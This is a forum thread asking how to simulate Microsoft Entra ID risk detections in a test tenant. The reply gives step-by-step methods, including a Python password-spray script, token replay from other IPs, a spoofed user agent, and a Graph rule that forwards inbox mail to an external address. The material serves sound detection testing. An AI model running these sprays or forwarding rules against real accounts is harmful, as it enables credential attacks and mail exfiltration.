Forum Discussion

nikunjbhatt_cds
Copper Contributor
Mar 11, 2025

Generating Additional riskEventType Events in Microsoft Entra ID

Hello,

We are using Simulated Risk Detections to test specific riskEventType detections based on Microsoft's documentation:

Reference: https://learn.microsoft.com/en-us/entra/id-protection/howto-identity-protection-simulate-risk

So far, we have successfully simulated the following risk detections:

  • Anonymous IP address
  • Unfamiliar sign-in properties
  • Atypical travel 
  • Leaked credentials in GitHub for workload identities 

However, the documentation states that other risk detections cannot be simulated in a secure manner.

We are looking for guidance on how to generate events for additional riskEventType detections in a controlled environment. Has anyone successfully tested or triggered these risk detections for security research or validation purposes? Any insights, best practices, or alternative approaches would be greatly appreciated.

Thanks!

1 Reply

  • Joe Stocker
    Bronze Contributor

    Admin confirmed user compromised (adminConfirmedUserCompromised):
    Sign in to the Microsoft Entra admin center with an account that has at least Security Administrator privileges. Navigate to Protection > Identity Protection > Risky Users, select a test user account, and manually mark the user as compromised by selecting "Confirm user compromised" from the available actions. This action will trigger the adminConfirmedUserCompromised detection, which should appear in the Risk Detections report shortly after.

    Anomalous Token (sign-in) (anomalousToken):
    To simulate this, generate a token for a test application in Entra ID by registering an app under Identity > Applications > App registrations, then create a client secret. Use the token in a way that deviates from normal behavior, such as signing in from a completely different device or IP address immediately after generating it, or attempting to use the token after modifying its properties (e.g., altering the token’s audience field if you have the technical capability). This may require scripting with tools like Postman to make API calls. Monitor the Risk Detections report for the anomalousToken event, which may take up to 48 hours to appear if detected offline.
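
    The token-generation step above can be scripted rather than done in Postman. This sketch builds a client-credentials request against the Entra v2.0 token endpoint for the test app registration; whether the subsequent anomalousToken detection actually fires still depends on Microsoft's models, and the tenant/app/secret values are placeholders:

    ```python
    import urllib.parse

    def build_token_request(tenant_id, client_id, client_secret):
        """Client-credentials request for the Entra ID v2.0 token endpoint.

        POST the returned body (form-encoded) to the returned URL to get
        an access token for the test app registration.
        """
        url = f"https://login.microsoftonline.com/{tenant_id}/oauth2/v2.0/token"
        body = urllib.parse.urlencode({
            "grant_type": "client_credentials",
            "client_id": client_id,
            "client_secret": client_secret,
            "scope": "https://graph.microsoft.com/.default",
        })
        return url, body

    # Placeholder values -- POST this from two different networks/devices
    # in quick succession to introduce the anomaly:
    url, body = build_token_request("<tenant-id>", "<app-id>", "<client-secret>")
    ```

    Replaying the resulting token from an unexpected IP or device shortly after issuance is the kind of deviation the reply describes.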

    Password Spray (passwordSpray): Use a script (e.g., PowerShell or a custom tool) to perform multiple login attempts with a common password (e.g., "Password123") across several test accounts in a controlled Entra ID tenant, ensuring the attempts are spaced out to mimic a real password spray attack.
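
    A minimal sketch of that spray script, assuming a test tenant you own and a public-client app registration that permits the ROPC (grant_type=password) flow; tenant and app IDs are placeholders, and the actual network loop is left commented out so the attempts are only sent deliberately:

    ```python
    import time               # used by the commented-out send loop below
    import urllib.parse
    import urllib.request     # used by the commented-out send loop below

    TENANT_ID = "<your-test-tenant-id>"   # assumption: a tenant you control
    CLIENT_ID = "<public-client-app-id>"  # assumption: app allowing ROPC sign-in
    TOKEN_URL = f"https://login.microsoftonline.com/{TENANT_ID}/oauth2/v2.0/token"

    def build_spray_attempts(usernames, password, delay_seconds=300):
        """One ROPC sign-in body per target account, same password for all.

        Spacing the attempts out (delay_seconds) mimics a low-and-slow spray.
        """
        attempts = []
        for user in usernames:
            body = urllib.parse.urlencode({
                "grant_type": "password",
                "client_id": CLIENT_ID,
                "scope": "openid",
                "username": user,
                "password": password,
            })
            attempts.append((user, body, delay_seconds))
        return attempts

    attempts = build_spray_attempts(
        ["test1@contoso.example", "test2@contoso.example"], "Password123")
    # for user, body, delay in attempts:
    #     urllib.request.urlopen(TOKEN_URL, data=body.encode())  # test tenant only!
    #     time.sleep(delay)
    ```

    Failed sign-ins land in the tenant's sign-in logs either way, so the run is easy to audit afterwards.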

    Suspicious browser (suspiciousBrowser): Simulate a sign-in from a test account using an outdated browser (e.g., Internet Explorer 8) or modify the user agent string to mimic a known malicious browser, then monitor Entra ID for the detection trigger.

    Suspicious inbox forwarding (suspiciousInboxForwarding): Set up an email forwarding rule to an external address and perform actions that might look suspicious (e.g., forwarding sensitive emails).
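
    The forwarding rule can be created programmatically via Microsoft Graph instead of through Outlook settings. This sketch builds the JSON body for POST /me/mailFolders/inbox/messageRules (requires the MailboxSettings.ReadWrite permission); the external address is a placeholder:

    ```python
    import json

    def build_forwarding_rule(external_address):
        """Body for POST /me/mailFolders/inbox/messageRules.

        Creates an inbox rule that forwards incoming mail to an external
        address -- the pattern suspiciousInboxForwarding looks for.
        """
        return {
            "displayName": "Test external forward",
            "sequence": 1,
            "isEnabled": True,
            "actions": {
                "forwardTo": [
                    {"emailAddress": {"address": external_address}},
                ],
                "stopProcessingRules": False,
            },
        }

    # Placeholder address -- send the body to Graph with a delegated token:
    rule = build_forwarding_rule("forward-target@external.example")
    print(json.dumps(rule, indent=2))
    ```

    Remember to delete the rule after the test so mail from the test mailbox stops leaving the tenant.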

    Mass Access to Sensitive Files (mcasFinSuspiciousFileAccess): Use a test account to download or access a large number of files flagged as sensitive in Defender for Cloud Apps.

    User reported suspicious activity (userReportedSuspiciousActivity): Entra ID allows users to report suspicious activity via the "Report a problem" feature in the sign-in flow. You could test this by having a user report their own sign-in as suspicious.

    For detections that involve machine learning (e.g., unfamiliarFeatures, anomalousUserActivity), establishing a baseline of normal behavior for the test account (e.g., consistent sign-in locations, devices, and times) before introducing anomalies can increase the likelihood of triggering the detection.

    Some detections, like Malicious IP address (maliciousIPAddress) or Verified threat actor IP (nationStateIP), cannot be simulated practically because they rely on Microsoft’s proprietary threat intelligence to flag specific IPs as malicious or tied to nation-state actors. Simulating these would require using an IP that Microsoft has already flagged, which isn’t feasible or ethical in a test environment.

    Detections like Microsoft Entra threat intelligence (investigationsThreatIntelligence) or Anomalous user activity (anomalousUserActivity) depend on machine learning models and Microsoft’s internal data, making them difficult to simulate without knowing the exact triggers or having access to Microsoft’s backend logic.
